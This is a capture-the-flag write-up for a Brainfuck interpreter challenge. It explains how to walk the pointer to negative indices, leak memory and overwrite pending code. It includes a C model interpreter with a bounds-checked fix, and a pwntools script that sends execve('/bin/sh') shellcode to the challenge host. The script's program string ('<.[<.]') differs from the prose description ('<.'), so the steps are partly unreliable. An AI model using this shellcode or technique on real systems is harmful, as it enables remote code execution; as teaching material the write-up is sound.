Original description:
We’re taking a whole new way of looking at brainf*ck. Go and check it out! nc challenges.tamuctf.com 31337
Solution
Brainfuck has only 8 commands (with their equivalent C code); table borrowed from Wikipedia:

| Instruction | Equivalent C |
|---|---|
| > | ++ptr; |
| < | --ptr; |
| + | ++*ptr; |
| - | --*ptr; |
| . | putchar(*ptr); |
| , | *ptr=getchar(); |
| [ | while (*ptr) { |
| ] | } |
By definition, the tape (memory at non-negative indices) is initialized to 0.
Memory at negative indices is not part of the tape at all, and the interpreter does not stop the pointer from moving there, so we enter 1000 "<." (move left, print) to confirm that the memory in front of the tape really is uninitialized: we get to read whatever the process keeps there.
After those prints our cursor is at -1000, which is inside the code buffer, so from there we insert one ",>" per shellcode byte (read a byte from input into the current cell, move right) to directly overwrite the code that will run after all our input.
As we don't want to clobber the instructions that are still being executed, the end of the program is padded with 1000 "<>" pairs: each pair shifts the pointer left and straight back right, a no-op, and it is this padding region that the shellcode is written over.
So our final program is: [print current cell, move left]*1000 + [read byte, move right]*len(shellcode) + [no-op "<>" padding of length 1000 that can safely be overwritten], followed on a second line by the shellcode, prefixed with 0x90 NOPs so that the exact alignment of the entry point into the overwritten region does not matter.
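To make the bug behind the technique above concrete, here is a small model interpreter in C. It is an added example, not the challenge binary and not the author's code: it mirrors the layout the solution relies on (the program text lies immediately in front of the data tape, so "negative" tape cells alias the code) and runs in two modes. The unchecked mode only refuses to leave the single allocation, so "<." leaks the program's own bytes and ",>" after walking left rewrites instructions that have not executed yet; the checked mode rejects the very first "<" at cell 0. In the challenge the overwritten bytes run as native code, hence the x86-64 shellcode below; in this model they run as Brainfuck, which shows the same control-flow hijack without a native backend. All names (`bf_vm`, `bf_run`, `CODE_SZ`, `TAPE_SZ`) and the test programs are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CODE_SZ 64            /* program text lives at mem[0..CODE_SZ), right-aligned */
#define TAPE_SZ 64            /* data tape lives at mem[CODE_SZ..CODE_SZ+TAPE_SZ)     */
#define MAX_STEPS 100000UL    /* step budget so a runaway loop cannot hang the demo   */

enum bf_status { BF_OK = 0, BF_ERR_BOUNDS, BF_ERR_BRACKET, BF_ERR_LIMIT };

/* One allocation holds both regions, so "negative" tape cells alias the program
 * text. This is an assumed model of the challenge layout, not its real binary. */
struct bf_vm {
    unsigned char mem[CODE_SZ + TAPE_SZ];
    const unsigned char *in;  size_t in_len, in_pos;
    unsigned char *out;       size_t out_cap, out_len;
};

/* Find the bracket matching code[pc] within [start, CODE_SZ); CODE_SZ if none.
 * Matching is done at run time because the code may have been rewritten. */
static size_t bf_match(const unsigned char *code, size_t pc, size_t start)
{
    int depth = 0;
    if (code[pc] == '[') {
        for (size_t i = pc; i < CODE_SZ; i++) {
            if (code[i] == '[') depth++;
            else if (code[i] == ']' && --depth == 0) return i;
        }
    } else {
        for (size_t i = pc + 1; i-- > start;) {
            if (code[i] == ']') depth++;
            else if (code[i] == '[' && --depth == 0) return i;
        }
    }
    return CODE_SZ;
}

static enum bf_status bf_run(struct bf_vm *vm, const char *prog, int checked)
{
    size_t plen = strlen(prog);
    if (plen == 0 || plen > CODE_SZ) return BF_ERR_LIMIT;
    memset(vm->mem, 0, sizeof vm->mem);
    size_t start = CODE_SZ - plen;          /* program ends exactly where the tape begins */
    memcpy(vm->mem + start, prog, plen);
    vm->in_pos = 0; vm->out_len = 0;

    unsigned char *code = vm->mem;
    long dp = 0;                            /* offset from tape[0]; negative = inside the code */
    unsigned long steps = 0;

    for (size_t pc = start; pc < CODE_SZ; pc++) {
        if (++steps > MAX_STEPS) return BF_ERR_LIMIT;
        unsigned char *cell = &vm->mem[CODE_SZ + dp];   /* dp was validated last iteration */
        switch (code[pc]) {
        case '>': dp++; break;
        case '<': dp--; break;
        case '+': (*cell)++; break;
        case '-': (*cell)--; break;
        case '.':
            if (vm->out_len == vm->out_cap) return BF_ERR_LIMIT;
            vm->out[vm->out_len++] = *cell; break;
        case ',':                           /* EOF reads as 0 in this model */
            *cell = (vm->in_pos < vm->in_len) ? vm->in[vm->in_pos++] : 0; break;
        case '[':
            if (*cell == 0 && (pc = bf_match(code, pc, start)) == CODE_SZ) return BF_ERR_BRACKET;
            break;
        case ']':
            if (*cell != 0 && (pc = bf_match(code, pc, start)) == CODE_SZ) return BF_ERR_BRACKET;
            break;
        default: break;                     /* anything else is a comment */
        }
        /* The bug: unchecked mode only keeps dp inside the allocation (a guard this demo
         * needs so it cannot crash the host). The fix: only the tape is addressable. */
        long lo = checked ? 0 : -(long)CODE_SZ;
        if (dp < lo || dp >= TAPE_SZ) return BF_ERR_BOUNDS;
    }
    return BF_OK;
}

/* Constructed test programs for this example (not from the challenge). */
#define LEAK_PROG    "<.<."               /* read tape[-1], tape[-2]: the program's own tail */
#define INJECT_PROG  "<<<<,>,>,>,><><>"   /* walk into the code, overwrite the "<><>" tail  */
#define INJECT_INPUT "+.+."               /* the "shellcode": BF here, x86-64 in the challenge */

static unsigned char demo_out[32];
static size_t demo_n;

/* Run prog with the given stdin bytes; output and its length land in demo_out/demo_n. */
static enum bf_status demo(const char *prog, const char *input, int checked)
{
    struct bf_vm vm;
    vm.in = (const unsigned char *)input; vm.in_len = strlen(input);
    vm.out = demo_out; vm.out_cap = sizeof demo_out;
    enum bf_status st = bf_run(&vm, prog, checked);
    demo_n = vm.out_len;
    return st;
}

int main(void)
{
    for (int checked = 0; checked <= 1; checked++) {
        enum bf_status st = demo(INJECT_PROG, INJECT_INPUT, checked);
        printf("%s: status=%d output=", checked ? "checked" : "unchecked", (int)st);
        for (size_t i = 0; i < demo_n; i++) printf("%02x ", demo_out[i]);
        printf("\n");
    }
    return 0;
}
```

In unchecked mode `LEAK_PROG` prints the last two characters of its own source (".<"), and `INJECT_PROG` ends up executing the four bytes it just read from stdin, printing the cell values 1 and 2 that the injected "+.+." produces; in checked mode both stop at the first "<" with `BF_ERR_BOUNDS` and print nothing, while ordinary programs that stay on the tape still run.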
Solution Code
```python
from pwn import *

# x86-64 execve("/bin/sh", ["/bin/sh"], NULL), prefixed with a 0x20-byte NOP sled
shellcode = b'\x90'*0x20+b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
N = 1000

r = remote("challenges.tamuctf.com", 31337)
r.recvuntil(b"bf$ ")
# 1. "<.[<.]" x N: move left and print; the [<.] loop keeps moving left and printing
#    while the current cell is non-zero (leaks the memory in front of the tape and
#    walks the pointer into the code buffer)
# 2. ",>" x len(shellcode): read one input byte into the current cell, move right
#    (writes the shellcode over code that has not executed yet)
# 3. "<>" x N: no-op padding that the shellcode is written over
r.sendline(b"<.[<.]"*N + b',>'*len(shellcode) + b"<>"*N)
# the bytes consumed by the ',' instructions above
r.sendline(shellcode)
r.interactive()
```